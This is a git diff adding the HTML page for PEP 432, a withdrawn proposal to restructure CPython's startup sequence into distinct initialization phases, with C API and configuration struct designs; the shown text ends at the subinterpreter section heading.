+ + + + + \ No newline at end of file diff --git a/pep-0432/index.html b/pep-0432/index.html new file mode 100644 index 00000000000..cd96ca807a7 --- /dev/null +++ b/pep-0432/index.html @@ -0,0 +1,1460 @@ + + + + + + + + PEP 432 – Restructuring the CPython startup sequence | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 432 – Restructuring the CPython startup sequence

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, +Victor Stinner <vstinner at python.org>, +Eric Snow <ericsnowcurrently at gmail.com>
+
Discussions-To:
+
Capi-SIG list
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Requires:
+
587
+
Created:
+
28-Dec-2012
+
Post-History:
+
28-Dec-2012, 02-Jan-2013, 30-Mar-2019, 28-Jun-2020
+
+
+
+
Table of Contents +
+
+

PEP Withdrawal

+

From late 2012 to mid 2020, this PEP provided general background and specific +concrete proposals for making the CPython startup sequence easier to maintain +and the CPython runtime easier to embed as part of a larger application.

+

For most of that time, the changes were maintained either in a separate feature +branch, or else as underscore-prefixed private APIs in the main CPython repo.

+

In 2019, PEP 587 migrated a subset of those API changes to the public CPython +API for Python 3.8+ (specifically, the PEP updated the interpreter runtime to +offer an explicitly multi-stage struct-based configuration interface).

+

In June 2020, in response to a query from the Steering Council, the PEP authors +decided that it made sense to withdraw the original PEP, as enough has changed +since PEP 432 was first written that we think any further changes to the +startup sequence and embedding API would be best formulated as a new PEP (or +PEPs) that take into account not only the not-yet-implemented ideas from PEP 432 +that weren’t considered sufficiently well validated to make their way into +PEP 587, but also any feedback on the public PEP 587 API, and any other lessons +that have been learned while adjusting the CPython implementation to be more +embedding and subinterpreter friendly.

+

In particular, PEPs proposing the following changes, and any further +infrastructure changes needed to enable them, would likely still be worth +exploring:

+
    +
  • shipping an alternate Python executable that ignores all user level +settings and runs in isolated mode by default, and would hence be more +suitable for execution of system level Python applications than the default +interpreter
  • +
  • enhancing the zipapp module to support the creation of single-file executables +from pure Python scripts (and potentially even Python extension modules, given +the introduction of multi-phase extension module initialisation)
  • +
  • migrating the complex sys.path initialisation logic from C to Python in order +to improve test suite coverage and the general maintainability of that code
  • +
+
+
+

Abstract

+

This PEP proposes a mechanism for restructuring the startup sequence for +CPython, making it easier to modify the initialization behaviour of the +reference interpreter executable, as well as making it easier to control +CPython’s startup behaviour when creating an alternate executable or +embedding it as a Python execution engine inside a larger application.

+

When implementation of this proposal is completed, interpreter startup will +consist of three clearly distinct and independently configurable phases:

+
    +
  • Python core runtime preinitialization
      +
    • setting up memory management
    • +
    • determining the encodings used for system interfaces (including settings +passed in for later configuration phase)
    • +
    +
  • +
  • Python core runtime initialization
      +
    • ensuring C API is ready for use
    • +
    • ensuring builtin and frozen modules are accessible
    • +
    +
  • +
  • Main interpreter configuration
      +
    • ensuring external modules are accessible
    • +
    • (Note: the name of this phase is quite likely to change)
    • +
    +
  • +
+

Changes are also proposed that impact main module execution and subinterpreter +initialization.

+

Note: TBC = To Be Confirmed, TBD = To Be Determined. The appropriate +resolution for most of these should become clearer as the reference +implementation is developed.

+
+
+

Proposal

+

This PEP proposes that initialization of the CPython runtime be split into +three clearly distinct phases:

+
    +
  • core runtime preinitialization
  • +
  • core runtime initialization
  • +
  • main interpreter configuration
  • +
+

(Earlier versions proposed only two phases, but experience with attempting to +implement the PEP as an internal CPython refactoring showed that at least 3 +phases are needed to get clear separation of concerns)

+

The proposed design also has significant implications for:

+
    +
  • main module execution
  • +
  • subinterpreter initialization
  • +
+

In the new design, the interpreter will move through the following +well-defined phases during the initialization sequence:

+
    +
  • Uninitialized - haven’t even started the pre-initialization phase yet
  • +
  • Pre-Initialization - no interpreter available
  • +
  • Runtime Initialized - main interpreter partially available, +subinterpreter creation not yet available
  • +
  • Initialized - main interpreter fully available, subinterpreter creation +available
  • +
+

PEP 587 is a more detailed proposal that covers separating out the +Pre-Initialization phase from the last two phases, but doesn’t allow embedding +applications to run arbitrary code while in the “Runtime Initialized” state +(instead, initializing the core runtime will also always fully initialize the +main interpreter, as that’s the way the native CPython CLI still works in +Python 3.8).

+

As a concrete use case to help guide any design changes, and to solve a known +problem where the appropriate defaults for system utilities differ from those +for running user scripts, this PEP proposes the creation and +distribution of a separate system Python (system-python) executable +which, by default, operates in “isolated mode” (as selected by the CPython +-I switch), as well as the creation of an example stub binary that just +runs an appended zip archive (permitting single-file pure Python executables) +rather than going through the normal CPython startup sequence.

+

To keep the implementation complexity under control, this PEP does not +propose wholesale changes to the way the interpreter state is accessed at +runtime. Changing the order in which the existing initialization steps +occur in order to make the startup sequence easier to maintain is already a +substantial change, and attempting to make those other changes at the same time +will make the change significantly more invasive and much harder to review. +However, such proposals may be suitable topics for follow-on PEPs or patches +- one key benefit of this PEP and its related subproposals is decreasing the +coupling between the internal storage model and the configuration interface, +so such changes should be easier once this PEP has been implemented.

+
+
+

Background

+

Over time, CPython’s initialization sequence has become progressively more +complicated, offering more options, as well as performing more complex tasks +(such as configuring the Unicode settings for OS interfaces in Python 3 [10], +bootstrapping a pure Python implementation of the import system, and +implementing an isolated mode more suitable for system applications that run +with elevated privileges [6]).

+

Much of this complexity is formally accessible only through the Py_Main +and Py_Initialize APIs, offering embedding applications little +opportunity for customisation. This creeping complexity also makes life +difficult for maintainers, as much of the configuration needs to take +place prior to the Py_Initialize call, meaning much of the Python C +API cannot be used safely.

+

A number of proposals are on the table for even more sophisticated +startup behaviour, such as better control over sys.path +initialization (e.g. easily adding additional directories on the command line +in a cross-platform fashion [7], controlling the configuration of +sys.path[0] [8]), easier configuration of utilities like coverage +tracing when launching Python subprocesses [9]).

+

Rather than continuing to bolt such behaviour onto an already complicated +system indefinitely, this PEP proposes to start simplifying the status quo by +introducing a more structured startup sequence, with the aim of making these +further feature requests easier to implement.

+

Originally the entire proposal was maintained in this one PEP, but that proved +impractical, so as parts of the proposed design stabilised, they are now split +out into their own PEPs, allowing progress to be made, even while the details +of the overall design are still evolving.

+
+
+

Key Concerns

+

There are a few key concerns that any change to the startup sequence +needs to take into account.

+
+

Maintainability

+

The CPython startup sequence as of Python 3.6 was difficult to understand, and +even more difficult to modify. It was not clear what state the interpreter was +in while much of the initialization code executed, leading to behaviour such +as lists, dictionaries and Unicode values being created prior to the call +to Py_Initialize when the -X or -W options are used [1].

+

By moving to an explicitly multi-phase startup sequence, developers should +only need to understand:

+
    +
  • which APIs and features are available prior to pre-configuration (essentially +none, except for the pre-configuration API itself)
  • +
  • which APIs and features are available prior to core runtime configuration, and +will implicitly run the pre-configuration with default settings that match the +behaviour of Python 3.6 if the pre-configuration hasn’t been run explicitly
  • +
  • which APIs and features are only available after the main interpreter has been +fully configured (which will hopefully be a relatively small subset of the +full C API)
  • +
+

The first two aspects of that are covered by PEP 587, while the details of the +latter distinction are still being considered.

+

By basing the new design on a combination of C structures and Python +data types, it should also be easier to modify the system in the +future to add new configuration options.

+
+
+

Testability

+

One of the problems with the complexity of the CPython startup sequence is the +combinatorial explosion of possible interactions between different configuration +settings.

+

This concern impacts both the design of the new initialisation system, and +the proposed approach for getting there.

+
+
+

Performance

+

CPython is used heavily to run short scripts where the runtime is dominated +by the interpreter initialization time. Any changes to the startup sequence +should minimise their impact on the startup overhead.

+

Experience with the importlib migration suggests that the startup time is +dominated by IO operations. However, to monitor the impact of any changes, +a simple benchmark can be used to check how long it takes to start and then +tear down the interpreter:

+
python3 -m timeit -s "from subprocess import call" "call(['./python', '-Sc', 'pass'])"
+
+
+

Current numbers on my system for Python 3.7 (as built by the Fedora project):

+
$ python3 -m timeit -s "from subprocess import call" "call(['python3', '-Sc', 'pass'])"
+50 loops, best of 5: 6.48 msec per loop
+
+
+

(TODO: run this microbenchmark with perf rather than the stdlib timeit)

+

This PEP is not expected to have any significant effect on the startup time, +as it is aimed primarily at reordering the existing initialization +sequence, without making substantial changes to the individual steps.

+

However, if this simple check suggests that the proposed changes to the +initialization sequence may pose a performance problem, then a more +sophisticated microbenchmark will be developed to assist in investigation.

+
+
+
+

Required Configuration Settings

+

See PEP 587 for a detailed listing of CPython interpreter configuration settings +and the various means available for setting them.

+
+
+

Implementation Strategy

+

An initial attempt was made at implementing an earlier version of this PEP for +Python 3.4 [2], with one of the significant problems encountered being merge +conflicts after the initial structural changes were put in place to start the +refactoring process. Unlike some other previous major changes, such as the +switch to an AST-based compiler in Python 2.5, or the switch to the importlib +implementation of the import system in Python 3.3, there is no clear way to +structure a draft implementation that won’t be prone to the kinds of merge +conflicts that afflicted the original attempt.

+

Accordingly, the implementation strategy was revised to instead first implement +this refactoring as a private API for CPython 3.7, and then review the viability +of exposing the new functions and structures as public API elements in CPython +3.8.

+

After the initial merge, Victor Stinner then proceeded to actually migrate +settings to the new structure in order to successfully implement the PEP 540 +UTF-8 mode changes (which required the ability to track all settings that had +previously been decoded with the locale encoding, and decode them again using +UTF-8 instead). Eric Snow also migrated a number of internal subsystems over as +part of making the subinterpreter feature more robust.

+

That work showed that the detailed design originally proposed in this PEP had a +range of practical issues, so Victor designed and implemented an improved +private API (inspired by an earlier iteration of this PEP), which PEP 587 +proposes to promote to a public API in Python 3.8.

+
+
+

Design Details

+
+

Note

+

The API details here are still very much in flux. The header files that show +the current state of the private API are mainly:

+ +

PEP 587 covers the aspects of the API that are considered potentially stable +enough to make public. Where a proposed API is covered by that PEP, +“(see PEP 587)” is added to the text below.

+
+

The main theme of this proposal is to initialize the core language runtime +and create a partially initialized interpreter state for the main interpreter +much earlier in the startup process. This will allow most of the CPython API +to be used during the remainder of the initialization process, potentially +simplifying a number of operations that currently need to rely on basic C +functionality rather than being able to use the richer data structures provided +by the CPython C API.

+

PEP 587 covers a subset of that task, which is splitting out the components that +even the existing “May be called before Py_Initialize” interfaces need (like +memory allocators and operating system interface encoding details) into a +separate pre-configuration step.

+

In the following, the term “embedding application” also covers the standard +CPython command line application.

+
+

Interpreter Initialization Phases

+

The following distinct interpreter initialisation phases are proposed:

+
    +
  • Uninitialized:
      +
    • Not really a phase, but the absence of a phase
    • +
    • Py_IsInitializing() returns 0
    • +
    • Py_IsRuntimeInitialized() returns 0
    • +
    • Py_IsInitialized() returns 0
    • +
    • The embedding application determines which memory allocator to use, and +which encoding to use to access operating system interfaces (or chooses +to delegate those decisions to the Python runtime)
    • +
    • Application starts the initialization process by calling one of the +Py_PreInitialize APIs (see PEP 587)
    • +
    +
  • +
  • Runtime Pre-Initialization:
      +
    • no interpreter is available
    • +
    • Py_IsInitializing() returns 1
    • +
    • Py_IsRuntimeInitialized() returns 0
    • +
    • Py_IsInitialized() returns 0
    • +
    • The embedding application determines the settings required to initialize +the core CPython runtime and create the main interpreter and moves to the +next phase by calling Py_InitializeRuntime
    • +
    • Note: as of PEP 587, the embedding application instead calls Py_Main(), +Py_UnixMain, or one of the Py_Initialize APIs, and hence jumps +directly to the Initialized state.
    • +
    +
  • +
  • Main Interpreter Initialization:
      +
    • the builtin data types and other core runtime services are available
    • +
    • the main interpreter is available, but only partially configured
    • +
    • Py_IsInitializing() returns 1
    • +
    • Py_IsRuntimeInitialized() returns 1
    • +
    • Py_IsInitialized() returns 0
    • +
    • The embedding application determines and applies the settings +required to complete the initialization process by calling +Py_InitializeMainInterpreter
    • +
    • Note: as of PEP 587, this state is not reachable via any public API, it +only exists as an implicit internal state while one of the Py_Initialize +functions is running
    • +
    +
  • +
  • Initialized:
      +
    • the main interpreter is available and fully operational, but +__main__ related metadata is incomplete
    • +
    • Py_IsInitializing() returns 0
    • +
    • Py_IsRuntimeInitialized() returns 1
    • +
    • Py_IsInitialized() returns 1
    • +
    +
  • +
+
+
+

Invocation of Phases

+

All listed phases will be used by the standard CPython interpreter and the +proposed System Python interpreter.

+

An embedding application may still continue to leave initialization almost +entirely under CPython’s control by using the existing Py_Initialize +or Py_Main() APIs - backwards compatibility will be preserved.

+

Alternatively, if an embedding application wants greater control +over CPython’s initial state, it will be able to use the new, finer +grained API, which allows the embedding application greater control +over the initialization process.

+

PEP 587 covers an initial iteration of that API, separating out the +pre-initialization phase without attempting to separate core runtime +initialization from main interpreter initialization.

+
+
+

Uninitialized State

+

The uninitialized state is where an embedding application determines the settings +which are required in order to be able to correctly pass configurations settings +to the embedded Python runtime.

+

This covers telling Python which memory allocator to use, as well as which text +encoding to use when processing provided settings.

+

PEP 587 defines the settings needed to exit this state in its PyPreConfig +struct.

+

A new query API will allow code to determine if the interpreter hasn’t even +started the initialization process:

+
int Py_IsInitializing();
+
+
+

The query for a completely uninitialized environment would then be +!(Py_Initialized() || Py_Initializing()).

+
+
+

Runtime Pre-Initialization Phase

+
+

Note

+

In PEP 587, the settings for this phase are not yet separated out, +and are instead only available through the combined PyConfig struct

+
+

The pre-initialization phase is where an embedding application determines +the settings which are absolutely required before the CPython runtime can be +initialized at all. Currently, the primary configuration settings in this +category are those related to the randomised hash algorithm - the hash +algorithms must be consistent for the lifetime of the process, and so they +must be in place before the core interpreter is created.

+

The essential settings needed are a flag indicating whether or not to use a +specific seed value for the randomised hashes, and if so, the specific value +for the seed (a seed value of zero disables randomised hashing). In addition, +due to the possible use of PYTHONHASHSEED in configuring the hash +randomisation, the question of whether or not to consider environment +variables must also be addressed early. Finally, to support the CPython +build process, an option is offered to completely disable the import +system.

+

The proposed APIs for this step in the startup sequence are:

+
PyInitError Py_InitializeRuntime(
+    const PyRuntimeConfig *config
+);
+
+PyInitError Py_InitializeRuntimeFromArgs(
+    const PyRuntimeConfig *config, int argc, char **argv
+);
+
+PyInitError Py_InitializeRuntimeFromWideArgs(
+    const PyRuntimeConfig *config, int argc, wchar_t **argv
+);
+
+
+

If Py_IsInitializing() is false, the Py_InitializeRuntime functions will +implicitly call the corresponding Py_PreInitialize function. The +use_environment setting will be passed down, while other settings will be +processed according to their defaults, as described in PEP 587.

+

The PyInitError return type is defined in PEP 587, and allows an embedding +application to gracefully handle Python runtime initialization failures, +rather than having the entire process abruptly terminated by Py_FatalError.

+

The new PyRuntimeConfig struct holds the settings required for preliminary +configuration of the core runtime and creation of the main interpreter:

+
/* Note: if changing anything in PyRuntimeConfig, also update
+ * PyRuntimeConfig_INIT */
+typedef struct {
+    bool use_environment;     /* as in PyPreConfig, PyConfig from PEP 587 */
+    int use_hash_seed;        /* PYTHONHASHSEED, as in PyConfig from PEP 587 */
+    unsigned long hash_seed;  /* PYTHONHASHSEED, as in PyConfig from PEP 587 */
+    bool _install_importlib;  /* Needed by freeze_importlib */
+} PyRuntimeConfig;
+
+/* Rely on the "designated initializer" feature of C99 */
+#define PyRuntimeConfig_INIT {.use_hash_seed=-1}
+
+
+

The core configuration settings pointer may be NULL, in which case the +default values are as specified in PyRuntimeConfig_INIT.

+

The PyRuntimeConfig_INIT macro is designed to allow easy initialization +of a struct instance with sensible defaults:

+
PyRuntimeConfig runtime_config = PyRuntimeConfig_INIT;
+
+
+

use_environment controls the processing of all Python related +environment variables. If the flag is true, then PYTHONHASHSEED is +processed normally. Otherwise, all Python-specific environment variables +are considered undefined (exceptions may be made for some OS specific +environment variables, such as those used on Mac OS X to communicate +between the App bundle and the main Python binary).

+

use_hash_seed controls the configuration of the randomised hash +algorithm. If it is zero, then randomised hashes with a random seed will +be used. It is positive, then the value in hash_seed will be used +to seed the random number generator. If the hash_seed is zero in this +case, then the randomised hashing is disabled completely.

+

If use_hash_seed is negative (and use_environment is true), +then CPython will inspect the PYTHONHASHSEED environment variable. If the +environment variable is not set, is set to the empty string, or to the value +"random", then randomised hashes with a random seed will be used. If the +environment variable is set to the string "0" the randomised hashing will +be disabled. Otherwise, the hash seed is expected to be a string +representation of an integer in the range [0; 4294967295].

+

To make it easier for embedding applications to use the PYTHONHASHSEED +processing with a different data source, the following helper function +will be added to the C API:

+
int Py_ReadHashSeed(char *seed_text,
+                    int *use_hash_seed,
+                    unsigned long *hash_seed);
+
+
+

This function accepts a seed string in seed_text and converts it to +the appropriate flag and seed values. If seed_text is NULL, +the empty string or the value "random", both use_hash_seed and +hash_seed will be set to zero. Otherwise, use_hash_seed will be set to +1 and the seed text will be interpreted as an integer and reported as +hash_seed. On success the function will return zero. A non-zero return +value indicates an error (most likely in the conversion to an integer).

+

The _install_importlib setting is used as part of the CPython build +process to create an interpreter with no import capability at all. It is +considered private to the CPython development team (hence the leading +underscore), as the only currently supported use case is to permit compiler +changes that invalidate the previously frozen bytecode for +importlib._bootstrap without breaking the build process.

+

The aim is to keep this initial level of configuration as small as possible +in order to keep the bootstrapping environment consistent across +different embedding applications. If we can create a valid interpreter state +without the setting, then the setting should appear solely in the comprehensive +PyConfig struct rather than in the core runtime configuration.

+

A new query API will allow code to determine if the interpreter is in the +bootstrapping state between the core runtime initialization and the creation of +the main interpreter state and the completion of the bulk of the main +interpreter initialization process:

+
int Py_IsRuntimeInitialized();
+
+
+

Attempting to call Py_InitializeRuntime() again when +Py_IsRuntimeInitialized() is already true is reported as a user +configuration error. (TBC, as existing public initialisation APIs support being +called multiple times without error, and simply ignore changes to any +write-once settings. It may make sense to keep that behaviour rather than trying +to make the new API stricter than the old one)

+

As frozen bytecode may now be legitimately run in an interpreter which is not +yet fully initialized, sys.flags will gain a new initialized flag.

+

With the core runtime initialised, the main interpreter and most of the CPython +C API should be fully functional except that:

+
    +
  • compilation is not allowed (as the parser and compiler are not yet +configured properly)
  • +
  • creation of subinterpreters is not allowed
  • +
  • creation of additional thread states is not allowed
  • +
  • The following attributes in the sys module are all either missing or +None: +* sys.path +* sys.argv +* sys.executable +* sys.base_exec_prefix +* sys.base_prefix +* sys.exec_prefix +* sys.prefix +* sys.warnoptions +* sys.dont_write_bytecode +* sys.stdin +* sys.stdout
  • +
  • The filesystem encoding is not yet defined
  • +
  • The IO encoding is not yet defined
  • +
  • CPython signal handlers are not yet installed
  • +
  • Only builtin and frozen modules may be imported (due to above limitations)
  • +
  • sys.stderr is set to a temporary IO object using unbuffered binary +mode
  • +
  • The sys.flags attribute exists, but the individual flags may not yet +have their final values.
  • +
  • The sys.flags.initialized attribute is set to 0
  • +
  • The warnings module is not yet initialized
  • +
  • The __main__ module does not yet exist
  • +
+

<TBD: identify any other notable missing functionality>

+

The main things made available by this step will be the core Python +data types, in particular dictionaries, lists and strings. This allows them +to be used safely for all of the remaining configuration steps (unlike the +status quo).

+

In addition, the current thread will possess a valid Python thread state, +allowing any further configuration data to be stored on the main interpreter +object rather than in C process globals.

+

Any call to Py_InitializeRuntime() must have a matching call to +Py_Finalize(). It is acceptable to skip calling +Py_InitializeMainInterpreter() in between (e.g. if attempting to build the +main interpreter configuration settings fails).

+
+
+

Determining the remaining configuration settings

+

The next step in the initialization sequence is to determine the remaining +settings needed to complete the process. No changes are made to the +interpreter state at this point. The core APIs for this step are:

+
int Py_BuildPythonConfig(
+    PyConfigAsObjects *py_config, const PyConfig *c_config
+);
+
+int Py_BuildPythonConfigFromArgs(
+    PyConfigAsObjects *py_config, const PyConfig *c_config, int argc, char **argv
+);
+
+int Py_BuildPythonConfigFromWideArgs(
+    PyConfigAsObjects *py_config, const PyConfig *c_config, int argc, wchar_t **argv
+);
+
+
+

The py_config argument should be a pointer to a PyConfigAsObjects struct +(which may be a temporary one stored on the C stack). For any already configured +value (i.e. any non-NULL pointer), CPython will sanity check the supplied value, +but otherwise accept it as correct.

+

A struct is used rather than a Python dictionary as the struct is easier +to work with from C, the list of supported fields is fixed for a given +CPython version and only a read-only view needs to be exposed to Python +code (which is relatively straightforward, thanks to the infrastructure +already put in place to expose sys.implementation).

+

Unlike Py_InitializeRuntime, this call will raise a Python exception and +report an error return rather than returning a Python initialization specific +C struct if a problem is found with the config data.

+

Any supported configuration setting which is not already set will be +populated appropriately in the supplied configuration struct. The default +configuration can be overridden entirely by setting the value before +calling Py_BuildPythonConfig. The provided value will then also be +used in calculating any other settings derived from that value.

+

Alternatively, settings may be overridden after the +Py_BuildPythonConfig call (this can be useful if an embedding +application wants to adjust a setting rather than replace it completely, +such as removing sys.path[0]).

+

The c_config argument is an optional pointer to a PyConfig structure, +as defined in PEP 587. If provided, it is used in preference to reading settings +directly from the environment or process global state.

+

Merely reading the configuration has no effect on the interpreter state: it +only modifies the passed in configuration struct. The settings are not +applied to the running interpreter until the Py_InitializeMainInterpreter +call (see below).

+
+
+

Supported configuration settings

+

The interpreter configuration is split into two parts: settings which are +either relevant only to the main interpreter or must be identical across the +main interpreter and all subinterpreters, and settings which may vary across +subinterpreters.

+

NOTE: For initial implementation purposes, only the flag indicating whether +or not the interpreter is the main interpreter will be configured on a per +interpreter basis. Other fields will be reviewed for whether or not they can +feasibly be made interpreter specific over the course of the implementation.

+
+

Note

+

The list of config fields below is currently out of sync with PEP 587. +Where they differ, PEP 587 takes precedence.

+
+

The PyConfigAsObjects struct mirrors the PyConfig struct from PEP 587, +but uses full Python objects to store values, rather than C level data types. +It adds raw_argv and argv list fields, so later initialisation steps +don’t need to accept those separately.

+

Fields are always pointers to Python data types, with unset values indicated by +NULL:

+
typedef struct {
+    /* Argument processing */
+    PyListObject *raw_argv;
+    PyListObject *argv;
+    PyListObject *warnoptions; /* -W switch, PYTHONWARNINGS */
+    PyDictObject *xoptions;    /* -X switch */
+
+    /* Filesystem locations */
+    PyUnicodeObject *program_name;
+    PyUnicodeObject *executable;
+    PyUnicodeObject *prefix;           /* PYTHONHOME */
+    PyUnicodeObject *exec_prefix;      /* PYTHONHOME */
+    PyUnicodeObject *base_prefix;      /* pyvenv.cfg */
+    PyUnicodeObject *base_exec_prefix; /* pyvenv.cfg */
+
+    /* Site module */
+    PyBoolObject *enable_site_config;  /* -S switch (inverted) */
+    PyBoolObject *no_user_site;        /* -s switch, PYTHONNOUSERSITE */
+
+    /* Import configuration */
+    PyBoolObject *dont_write_bytecode; /* -B switch, PYTHONDONTWRITEBYTECODE */
+    PyBoolObject *ignore_module_case;  /* PYTHONCASEOK */
+    PyListObject *import_path;        /* PYTHONPATH (etc) */
+
+    /* Standard streams */
+    PyBoolObject    *use_unbuffered_io; /* -u switch, PYTHONUNBUFFEREDIO */
+    PyUnicodeObject *stdin_encoding;    /* PYTHONIOENCODING */
+    PyUnicodeObject *stdin_errors;      /* PYTHONIOENCODING */
+    PyUnicodeObject *stdout_encoding;   /* PYTHONIOENCODING */
+    PyUnicodeObject *stdout_errors;     /* PYTHONIOENCODING */
+    PyUnicodeObject *stderr_encoding;   /* PYTHONIOENCODING */
+    PyUnicodeObject *stderr_errors;     /* PYTHONIOENCODING */
+
+    /* Filesystem access */
+    PyUnicodeObject *fs_encoding;
+
+    /* Debugging output */
+    PyBoolObject *debug_parser;    /* -d switch, PYTHONDEBUG */
+    PyLongObject *verbosity;       /* -v switch */
+
+    /* Code generation */
+    PyLongObject *bytes_warnings;  /* -b switch */
+    PyLongObject *optimize;        /* -O switch */
+
+    /* Signal handling */
+    PyBoolObject *install_signal_handlers;
+
+    /* Implicit execution */
+    PyUnicodeObject *startup_file;  /* PYTHONSTARTUP */
+
+    /* Main module
+     *
+     * If prepare_main is set, at most one of the main_* settings should
+     * be set before calling PyRun_PrepareMain (Py_ReadMainInterpreterConfig
+     * will set one of them based on the command line arguments if
+     * prepare_main is non-zero when that API is called).
+    PyBoolObject    *prepare_main;
+    PyUnicodeObject *main_source; /* -c switch */
+    PyUnicodeObject *main_path;   /* filesystem path */
+    PyUnicodeObject *main_module; /* -m switch */
+    PyCodeObject    *main_code;   /* Run directly from a code object */
+    PyObject        *main_stream; /* Run from stream */
+    PyBoolObject    *run_implicit_code; /* Run implicit code during prep */
+
+    /* Interactive main
+     *
+     * Note: Settings related to interactive mode are very much in flux.
+     */
+    PyObject *prompt_stream;      /* Output interactive prompt */
+    PyBoolObject *show_banner;    /* -q switch (inverted) */
+    PyBoolObject *inspect_main;   /* -i switch, PYTHONINSPECT */
+
+} PyConfigAsObjects;
+
+
+

The PyInterpreterConfig struct holds the settings that may vary between +the main interpreter and subinterpreters. For the main interpreter, these +settings are automatically populated by Py_InitializeMainInterpreter().

+
typedef struct {
+    PyBoolObject *is_main_interpreter;    /* Easily check for subinterpreters */
+} PyInterpreterConfig;
+
+
+

As these structs consist solely of object pointers, no explicit initializer +definitions are needed - C99’s default initialization of struct memory to zero +is sufficient.

+
+
+

Completing the main interpreter initialization

+

The final step in the initialization process is to actually put the +configuration settings into effect and finish bootstrapping the main +interpreter up to full operation:

+
int Py_InitializeMainInterpreter(const PyConfigAsObjects *config);
+
+
+

Like Py_BuildPythonConfig, this call will raise an exception and +report an error return rather than exhibiting fatal errors if a problem is +found with the config data. (TBC, as existing public initialisation APIs support +being called multiple times without error, and simply ignore changes to any +write-once settings. It may make sense to keep that behaviour rather than trying +to make the new API stricter than the old one)

+

All configuration settings are required - the configuration struct +should always be passed through Py_BuildPythonConfig to ensure it +is fully populated.

+

After a successful call Py_IsInitialized() will become true and +Py_IsInitializing() will become false. The caveats described above for the +interpreter during the phase where only the core runtime is initialized will +no longer hold.

+

Attempting to call Py_InitializeMainInterpreter() again when +Py_IsInitialized() is true is an error.

+

However, some metadata related to the __main__ module may still be +incomplete:

+
    +
  • sys.argv[0] may not yet have its final value
      +
    • it will be -m when executing a module or package with CPython
    • +
    • it will be the same as sys.path[0] rather than the location of +the __main__ module when executing a valid sys.path entry +(typically a zipfile or directory)
    • +
    • otherwise, it will be accurate:
        +
      • the script name if running an ordinary script
      • +
      • -c if executing a supplied string
      • +
      • - or the empty string if running from stdin
      • +
      +
    • +
    +
  • +
  • the metadata in the __main__ module will still indicate it is a +builtin module
  • +
+

This function will normally implicitly import site as its final operation +(after Py_IsInitialized() is already set). Setting the +“enable_site_config” flag to Py_False in the configuration settings will +disable this behaviour, as well as eliminating any side effects on global +state if import site is later explicitly executed in the process.

+
+
+

Preparing the main module

+
+

Note

+

In PEP 587, PyRun_PrepareMain and PyRun_ExecMain are not +exposed separately, and are instead accessed through a Py_RunMain API +that both prepares and executes main, and then finalizes the Python +interpreter.

+
+

This subphase completes the population of the __main__ module +related metadata, without actually starting execution of the __main__ +module code.

+

It is handled by calling the following API:

+
int PyRun_PrepareMain();
+
+
+

This operation is only permitted for the main interpreter, and will raise +RuntimeError when invoked from a thread where the current thread state +belongs to a subinterpreter.

+

The actual processing is driven by the main related settings stored in +the interpreter state as part of the configuration struct.

+

If prepare_main is zero, this call does nothing.

+

If all of main_source, main_path, main_module, +main_stream and main_code are NULL, this call does nothing.

+

If more than one of main_source, main_path, main_module, +main_stream or main_code are set, RuntimeError will be reported.

+

If main_code is already set, then this call does nothing.

+

If main_stream is set, and run_implicit_code is also set, then +the file identified in startup_file will be read, compiled and +executed in the __main__ namespace.

+

If main_source, main_path or main_module are set, then this +call will take whatever steps are needed to populate main_code:

+
    +
  • For main_source, the supplied string will be compiled and saved to +main_code.
  • +
  • For main_path:
      +
    • if the supplied path is recognised as a valid sys.path entry, it +is inserted as sys.path[0], main_module is set +to __main__ and processing continues as for main_module below.
    • +
    • otherwise, path is read as a CPython bytecode file
    • +
    • if that fails, it is read as a Python source file and compiled
    • +
    • in the latter two cases, the code object is saved to main_code +and __main__.__file__ is set appropriately
    • +
    +
  • +
  • For main_module:
      +
    • any parent package is imported
    • +
    • the loader for the module is determined
    • +
    • if the loader indicates the module is a package, add .__main__ to +the end of main_module and try again (if the final name segment +is already .__main__ then fail immediately)
    • +
    • once the module source code is located, save the compiled module code +as main_code and populate the following attributes in __main__ +appropriately: __name__, __loader__, __file__, +__cached__, __package__.
    • +
    +
  • +
+

(Note: the behaviour described in this section isn’t new, it’s a write-up +of the current behaviour of the CPython interpreter adjusted for the new +configuration system)

+
+
+

Executing the main module

+
+

Note

+

In PEP 587, PyRun_PrepareMain and PyRun_ExecMain are not +exposed separately, and are instead accessed through a Py_RunMain API +that both prepares and executes main, and then finalizes the Python +interpreter.

+
+

This subphase covers the execution of the actual __main__ module code.

+

It is handled by calling the following API:

+
int PyRun_ExecMain();
+
+
+

This operation is only permitted for the main interpreter, and will raise +RuntimeError when invoked from a thread where the current thread state +belongs to a subinterpreter.

+

The actual processing is driven by the main related settings stored in +the interpreter state as part of the configuration struct.

+

If both main_stream and main_code are NULL, this call does nothing.

+

If both main_stream and main_code are set, RuntimeError will +be reported.

+

If main_stream and prompt_stream are both set, main execution will +be delegated to a new internal API:

+
int _PyRun_InteractiveMain(PyObject *input, PyObject* output);
+
+
+

If main_stream is set and prompt_stream is NULL, main execution will +be delegated to a new internal API:

+
int _PyRun_StreamInMain(PyObject *input);
+
+
+

If main_code is set, main execution will be delegated to a new internal +API:

+
int _PyRun_CodeInMain(PyCodeObject *code);
+
+
+

After execution of main completes, if inspect_main is set, or +the PYTHONINSPECT environment variable has been set, then +PyRun_ExecMain will invoke +_PyRun_InteractiveMain(sys.__stdin__, sys.__stdout__).

+
+
+

Internal Storage of Configuration Data

+

The interpreter state will be updated to include details of the configuration +settings supplied during initialization by extending the interpreter state +object with at least an embedded copy of the PyConfigAsObjects and +PyInterpreterConfig structs.

+

For debugging purposes, the configuration settings will be exposed as +a sys._configuration simple namespace (similar to sys.flags and +sys.implementation. The attributes will be themselves by simple namespaces +corresponding to the two levels of configuration setting:

+
    +
  • all_interpreters
  • +
  • active_interpreter
  • +
+

Field names will match those in the configuration structs, except for +hash_seed, which will be deliberately excluded.

+

An underscored attribute is chosen deliberately, as these configuration +settings are part of the CPython implementation, rather than part of the +Python language definition. If new settings are needed to support +cross-implementation compatibility in the standard library, then those +should be agreed with the other implementations and exposed as new required +attributes on sys.implementation, as described in PEP 421.

+

These are snapshots of the initial configuration settings. They are not +modified by the interpreter during runtime (except as noted above).

+
+
+

Creating and Configuring Subinterpreters

+

